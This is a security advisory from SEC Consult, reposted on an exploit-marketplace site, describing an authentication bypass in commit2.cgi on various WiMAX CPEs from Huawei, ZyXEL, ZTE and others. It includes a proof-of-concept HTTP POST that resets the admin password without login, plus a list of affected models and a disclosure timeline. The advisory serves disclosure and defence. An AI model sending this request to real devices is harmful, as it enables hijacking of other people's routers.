0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WiMAX CPE Authentication Bypass Vulnerability
[title: Various WiMAX CPEs Authentication Bypass
product: see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version:
CVE number:
impact: Critical
homepage:
found: 2016-08-22
by: Stefan ViehbAPck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
Various vendors are affected. See "Vulnerable / tested versions".
Business recommendation:
------------------------
SEC Consult recommends to decommission affected devices.
Vulnerability overview/description:
-----------------------------------
Various WiMAX CPEs are vulnerable to an authentication bypass. An attacker
can set arbitrary configuration values without prior authentication.
The vulnerability is located in commit2.cgi (implemented in libmtk_httpd_plugin.so)
Proof of concept:
-----------------
The following HTTP request sets the admin username and password (configuration
ADMIN_PASSWD) to "admin".
An attacker can now login in with admin permissions.
POST /commit2.cgi HTTP/1.1
Host: 1.2.3.4
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/
Vulnerable / tested versions:
-----------------------------
The vulnerability was found in the firmware of various WiMAX CPEs.
A list of "likely" affected products is below. The firmware of these products was
developed by ZyXEL and is likely based on the MediaTek SDK.
The relation with Huawei, ZTE, MADA etc. is not clear, possibly ODM/OEM/OBM.
GreenPacket OX350 (Version: ?)
GreenPacket OX-350 (Version: ?)
Huawei BM2022 (Version: v2.10.14)
Huawei HES-309M (Version: ?)
Huawei HES-319M (Version: ?)
Huawei HES-319M2W (Version: ?)
Huawei HES-339M (Version: ?)
MADA Soho Wireless Router (Version: v2.10.13)
ZTE OX-330P (Version: ?)
ZyXEL MAX218M (Version: 2.00(UXG.0)D0)
ZyXEL MAX218M1W (Version: 2.00(UXE.3)D0)
ZyXEL MAX218MW (Version: 2.00(UXD.2)D0)
ZyXEL MAX308M (Version: 2.00(UUA.3)D0)
ZyXEL MAX318M (Version: ?)
ZyXEL MAX338M (Version: ?)
It is _very likely_, that other products are affected as well.
On some devices remote HTTP/HTTPS administration via the WAN connection is
enabled.
Vendor contact timeline:
------------------------
2016-09-09: Sending advisory draft to Huawei PSIRT.
2016-09-09: Huawei confirms receipt of advisory. Starts investigation.
2016-09-23: Huawei states that affected products are End of Service (EOS) since
2014.
2016-10-08: Sending questions regarding other affected vendors and relation to
the vendors.
2016-11-22: Huawei states that they cannot share requested information.
2017-04-04: Informing CERT/CC.
2017-06-07: Coordinated release of security advisory.
Solution:
---------
None available.
Workaround:
-----------
Restrict network access to the web interface from WAN.
# 0day.today [2024-11-15] #